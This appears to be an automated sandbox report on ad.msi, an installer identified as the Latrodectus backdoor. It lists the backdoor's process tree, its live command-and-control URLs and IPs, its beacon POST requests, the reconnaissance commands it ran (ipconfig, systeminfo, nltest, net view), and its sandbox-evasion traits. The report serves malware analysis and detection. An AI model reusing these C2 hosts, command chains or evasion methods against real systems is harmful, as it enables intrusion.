Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ad.msi

Overview

General Information

Sample name:ad.msi
Analysis ID:1431940
MD5:666151c11b7899a0c764abe711d3f9b3
SHA1:35462114e096f4d307607d713136bfe38479870d
SHA256:8041a15e27c785f2adcce9e8c643f5cc619b52e50cd36ff043d13c4089ce1cad
Infos:

Detection

Latrodectus
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Latrodectus
C2 URLs / IPs found in malware configuration
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to detect sleep reduction / modifications
Drops executables to the windows directory (C:\Windows) and starts them
PE file contains section with special chars
Performs a network lookup / discovery via net view
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Uses ipconfig to lookup or modify the Windows network settings
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the current domain controller via net
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 5948 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\ad.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 3528 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7120 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding E4F2088FE7B6F79163C652AEB7DCBA5B C MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 6024 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 2B25E5241F8800AB2020C808DD90D583 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MSID8B1.tmp (PID: 2828 cmdline: "C:\Windows\Installer\MSID8B1.tmp" C:/Windows/System32/rundll32.exe C:\Users\user\AppData\Local\sharepoint\360total.dll, homq MD5: B9545ED17695A32FACE8C3408A6A3553)
  • rundll32.exe (PID: 5668 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq MD5: EF3179D498793BF4234F708D3BE28633)
    • rundll32.exe (PID: 2624 cmdline: rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_77697333.dll", homq MD5: EF3179D498793BF4234F708D3BE28633)
      • cmd.exe (PID: 5428 cmdline: /c ipconfig /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 6788 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)
      • cmd.exe (PID: 5544 cmdline: /c systeminfo MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 5148 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
          • WmiPrvSE.exe (PID: 5560 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • cmd.exe (PID: 7160 cmdline: /c nltest /domain_trusts MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • nltest.exe (PID: 1868 cmdline: nltest /domain_trusts MD5: 70E221CE763EA128DBA484B2E4903DE1)
      • cmd.exe (PID: 6392 cmdline: /c nltest /domain_trusts /all_trusts MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • nltest.exe (PID: 2604 cmdline: nltest /domain_trusts /all_trusts MD5: 70E221CE763EA128DBA484B2E4903DE1)
      • cmd.exe (PID: 1900 cmdline: /c net view /all /domain MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net.exe (PID: 2296 cmdline: net view /all /domain MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
  • rundll32.exe (PID: 3664 cmdline: rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_77697333.dll", homq MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Unidentified 111 (Latrodectus), LatrodectusFirst discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_111

Malware Configuration

Threatname: Latrodectus

{"C2 url": ["https://jarinamaers.shop/live/", "https://wrankaget.site/live/"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.3239594516.000002473B520000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
    00000007.00000002.3239003691.0000005536378000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
      00000008.00000002.2009341046.00000210FE9F0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
        00000007.00000003.2918615287.000002473B890000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
          00000008.00000002.2009386305.00000210FEA00000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
            Click to see the 8 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            8.2.rundll32.exe.210fe9f0000.0.raw.unpackJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
              6.2.rundll32.exe.1fb3ab70000.2.unpackJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
                6.2.rundll32.exe.1fb3ab70000.2.raw.unpackJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
                  6.2.rundll32.exe.1fb3ab60000.1.unpackJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
                    7.2.rundll32.exe.24739a10000.1.raw.unpackJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
                      Click to see the 7 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Net.exe Execution
                      Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net view /all /domain, CommandLine: net view /all /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net view /all /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1900, ParentProcessName: cmd.exe, ProcessCommandLine: net view /all /domain, ProcessId: 2296, ProcessName: net.exe
                      Sigma detected: Share And Session Enumeration Using Net.EXE
                      Source: Process startedAuthor: Endgame, JHasenbusch (ported for oscd.community): Data: Command: net view /all /domain, CommandLine: net view /all /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net view /all /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1900, ParentProcessName: cmd.exe, ProcessCommandLine: net view /all /domain, ProcessId: 2296, ProcessName: net.exe
                      Sigma detected: Suspicious Network Command
                      Source: Process startedAuthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: /c ipconfig /all, CommandLine: /c ipconfig /all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_77697333.dll", homq , ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 2624, ParentProcessName: rundll32.exe, ProcessCommandLine: /c ipconfig /all, ProcessId: 5428, ProcessName: cmd.exe

                      Snort Signatures

                      No Snort rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 8.2.rundll32.exe.210fea00000.1.unpackMalware Configuration Extractor: Latrodectus {"C2 url": ["https://jarinamaers.shop/live/", "https://wrankaget.site/live/"]}
                      Multi AV Scanner detection for dropped file
                      Source: :wtfbbq (copy)Virustotal: Detection: 14%Perma Link
                      Source: C:\Users\user\AppData\Local\sharepoint\360total.dllVirustotal: Detection: 14%Perma Link
                      Source: C:\Users\user\AppData\Roaming\Custom_update\Update_77697333.dllVirustotal: Detection: 14%Perma Link
                      Multi AV Scanner detection for submitted file
                      Source: ad.msiVirustotal: Detection: 8%Perma Link
                      Sample uses string decryption to hide its real strings
                      Source: 6.2.rundll32.exe.1fb3ab60000.1.unpackString decryptor: H-%8L
                      Source: 6.2.rundll32.exe.1fb3ab60000.1.unpackString decryptor: )b
                      Source: 6.2.rundll32.exe.1fb3ab60000.1.unpackString decryptor: $k$
                      Source: 6.2.rundll32.exe.1fb3ab60000.1.unpackString decryptor:
                      Source: 6.2.rundll32.exe.1fb3ab60000.1.unpackString decryptor: h
                      Source: 6.2.rundll32.exe.1fb3ab60000.1.unpackString decryptor:
                      Source: 6.2.rundll32.exe.1fb3ab60000.1.unpackString decryptor:
                      Source: 6.2.rundll32.exe.1fb3ab60000.1.unpackString decryptor: !"#$%&'()*+,-./012345678
                      Source: 6.2.rundll32.exe.1fb3ab60000.1.unpackString decryptor:
                      Source: 6.2.rundll32.exe.1fb3ab60000.1.unpackString decryptor: @ !"#$%&'()*+,-./0123456789:;<=>?@
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018003BC0C CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,6_2_000000018003BC0C
                      Source: unknownHTTPS traffic detected: 104.21.46.75:443 -> 192.168.2.5:49714 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.219.28:443 -> 192.168.2.5:49718 version: TLS 1.2
                      Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSID8B1.tmp, 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp, MSID8B1.tmp, 00000005.00000000.1989909897.0000000000B67000.00000002.00000001.01000000.00000003.sdmp, ad.msi, MSID8B1.tmp.1.dr, 5fd5a1.msi.1.dr, MSID824.tmp.1.dr
                      Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.dr
                      Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.dr
                      Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSID8B1.tmp, 00000005.00000002.1997119056.0000000000B67000.00000002.00000001.01000000.00000003.sdmp, MSID8B1.tmp, 00000005.00000000.1989909897.0000000000B67000.00000002.00000001.01000000.00000003.sdmp, ad.msi, MSID8B1.tmp.1.dr, 5fd5a1.msi.1.dr, MSID824.tmp.1.dr
                      Source: Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.1995316224.000001FB3C5F0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3238751138.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_77697333.dll.6.dr, 360total.dll.1.dr

                      Spreading

                      barindex
                      Performs a network lookup / discovery via net view
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domain
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domainJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: c:Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B5AF79 FindFirstFileExW,5_2_00B5AF79
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB7A350 FindFirstFileW,FindNextFileW,LoadLibraryW,6_2_000001FB3AB7A350
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB71A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,6_2_000001FB3AB71A08
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A4A350 FindFirstFileW,FindNextFileW,LoadLibraryW,7_2_0000024739A4A350
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A41A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,7_2_0000024739A41A08
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA0A350 FindFirstFileW,FindNextFileW,LoadLibraryW,8_2_00000210FEA0A350
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA01A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,8_2_00000210FEA01A08

                      Networking

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 104.21.46.75 443Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeNetwork Connect: 172.67.219.28 443Jump to behavior
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: https://jarinamaers.shop/live/
                      Source: Malware configuration extractorURLs: https://wrankaget.site/live/
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: global trafficHTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 252Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 180Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 180Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 180Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: grizmotras.comContent-Length: 180Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: grizmotras.comContent-Length: 180Cache-Control: no-cache
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB78D90 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,6_2_000001FB3AB78D90
                      Source: global trafficDNS traffic detected: DNS query: jarinamaers.shop
                      Source: global trafficDNS traffic detected: DNS query: grizmotras.com
                      Source: unknownHTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: jarinamaers.shopContent-Length: 252Cache-Control: no-cache
                      Source: rundll32.exe, 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.1995316224.000001FB3C5F0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3238751138.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_77697333.dll.6.dr, 360total.dll.1.drString found in binary or memory: ftp://ftp%2desktop.ini
                      Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                      Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
